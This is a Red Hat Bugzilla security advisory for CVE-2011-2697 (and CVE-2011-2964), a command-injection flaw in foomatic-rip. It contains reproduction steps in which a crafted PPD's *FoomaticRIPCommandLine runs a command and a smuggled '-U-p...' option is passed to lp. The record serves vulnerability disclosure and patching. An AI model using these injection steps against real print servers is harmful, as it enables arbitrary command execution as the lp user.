Bug 721001 (CVE-2011-2697)
Summary: | CVE-2011-2697 foomatic: Improper sanitization of command line option in foomatic-rip | ||
---|---|---|---|
Product: | [Other] Security Response | Reporter: | Jan Lieskovsky <jlieskov> |
Component: | vulnerability | Assignee: | Red Hat Product Security <security-response-team> |
Status: | CLOSED ERRATA | QA Contact: | |
Severity: | medium | Docs Contact: | |
Priority: | medium | ||
Version: | unspecified | CC: | jpopelka, twaugh, vdanen |
Target Milestone: | --- | Keywords: | Security |
Target Release: | --- | ||
Hardware: | All | ||
OS: | Linux | ||
Whiteboard: | |||
Fixed In Version: | Doc Type: | Bug Fix | |
Doc Text: | Story Points: | --- | |
Clone Of: | Environment: | ||
Last Closed: | 2011-08-01 16:00:55 UTC | Type: | --- |
Regression: | --- | Mount Type: | --- |
Documentation: | --- | CRM: | |
Verified Versions: | Category: | --- | |
oVirt Team: | --- | RHEL 7.3 requirements from Atomic Host: | |
Cloudforms Team: | --- | Target Upstream Version: | |
Embargoed: | |||
Bug Depends On: | 725631, 725632, 725633, 833897 | ||
Bug Blocks: | 721067 | ||
Attachments: |
Description
Jan Lieskovsky
2011-07-13 14:18:58 UTC
Created attachment 512673 [details]
Local copy of "enhanced patch from upstream for the current C code foomatic-rip" (#c24 in Novell bugzilla) patch
Created attachment 512674 [details]
Local copy of "enhanced patch from upstream for the older foomatic-rip Perl script" (#c25 in Novell bugzilla) patch
This issue affects the versions of the foomatic package, as shipped with Red Hat Enterprise Linux 4, 5, and 6. -- This issue affects the versions of the foomatic package, as shipped with Fedora release of 14 and 15. Please schedule an update. Created foomatic tracking bugs for this issue Affects: fedora-all [bug 721008] Further detail from Novell bugzilla [1] how to reproduce the issue (scenario would need to be modified a bit though, to successfully apply to foomatic-rip versions, shipped across Red Hat products): ============================================================================== How to reproduce with foomatic-rip: 1. Set up a queue which uses foomatic-rip i.e. use a PPD which has an "*cupsFilter: ... foomatic-rip" entry: # lpadmin -p testy2 -v file:/dev/null \ -P /usr/share/cups/model/OpenPrintingPPDs/ghostscript/Generic-PCL_5c_Printer.ljet4.ppd.gz \ -E If you don't have openSUSE 11.4 the Generic-PCL_5c_Printer.ljet4.ppd.gz is located in /usr/share/cups/model/Generic/PCL_5c_Printer-ljet4.ppd.gz 2. Get the PPD as normal user: $ wget http://localhost:631/printers/testy2.ppd ... 2011-06-07 12:38:59 (795 MB/s) - `testy2.ppd' saved [13829/13829] 3. Modify the PPD as normal user: Change the *FoomaticRIPCommandLine: entry (up to the *End line) as one likes, e.g. to this single line (without *End line: *FoomaticRIPCommandLine: "/bin/cp /etc/SuSE-release /tmp/testy2.out" 4. Print a dummy job to find out the current job id as normal user: $ echo Hello | lp -d testy2 request id is testy2-111 5. Print the malicious job as normal user: $ lp -d testy -U'-p/var/spool/cups/d00112-001' \ -o document-format=text/plain testy2.ppd request id is testy-112 6: Verify that the FoomaticRIPCommandLine was actually executed: # ls -l /tmp/testy2.out -rw------- 1 lp lp 57 Jun 7 12:40 /tmp/testy2.out # cat /tmp/testy2.out openSUSE 11.4 (x86_64) VERSION = 11.4 CODENAME = Celadon ============================================================================== And one correction regarding point 5. yet: How to reproduce with foomatic-rip: ... 5. Print the malicious job as normal user: $ lp -d testy2 -U'-p/var/spool/cups/d00112-001' \ -o document-format=text/plain testy2.ppd request id is testy2-112 The CVE identifier of CVE-2011-2697 has been assigned to this issue: http://www.openwall.com/lists/oss-security/2011/07/18/3 Created attachment 515184 [details]
ppd containing cupsFilter
MITRE has assigned two CVE names here: Common Vulnerabilities and Exposures assigned an identifier CVE-2011-2697 to the following vulnerability: Name: CVE-2011-2697 URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2697 Assigned: 20110711 Reference: http://www.openwall.com/lists/oss-security/2011/07/13/3 Reference: http://www.openwall.com/lists/oss-security/2011/07/18/3 Reference: http://www.openwall.com/lists/oss-security/2011/07/28/1 Reference: https://bugzilla.novell.com/show_bug.cgi?id=698451 Reference: https://bugzilla.redhat.com/show_bug.cgi?id=721001 foomatic-rip-hplip in HP Linux Imaging and Printing (HPLIP) 3.11.5 allows remote attackers to execute arbitrary code via a crafted *FoomaticRIPCommandLine field in a .ppd file. Common Vulnerabilities and Exposures assigned an identifier CVE-2011-2964 to the following vulnerability: Name: CVE-2011-2964 URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2964 Assigned: 20110729 Reference: http://www.openwall.com/lists/oss-security/2011/07/13/3 Reference: http://www.openwall.com/lists/oss-security/2011/07/18/3 Reference: http://www.openwall.com/lists/oss-security/2011/07/28/1 Reference: https://bugzilla.novell.com/show_bug.cgi?id=698451 Reference: https://bugzilla.redhat.com/show_bug.cgi?id=721001 foomaticrip.c in foomatic-rip in foomatic-filters in Foomatic 4.0.6 allows remote attackers to execute arbitrary code via a crafted *FoomaticRIPCommandLine field in a .ppd file, a different vulnerability than CVE-2011-2697. Looking at the description of the CVEs from above: CVE-2011-2697 is for the perl version in foomatic 3.x: Affects: rhel-4 , rhel-5 CVE-2011-2964 is for the C version in foomatic 4.x: Affects: rhel-6, Fedora Keeping this bug for the perl issue. This issue has been addressed in following products: Red Hat Enterprise Linux 4 Red Hat Enterprise Linux 5 Via RHSA-2011:1109 https://rhn.redhat.com/errata/RHSA-2011-1109.html |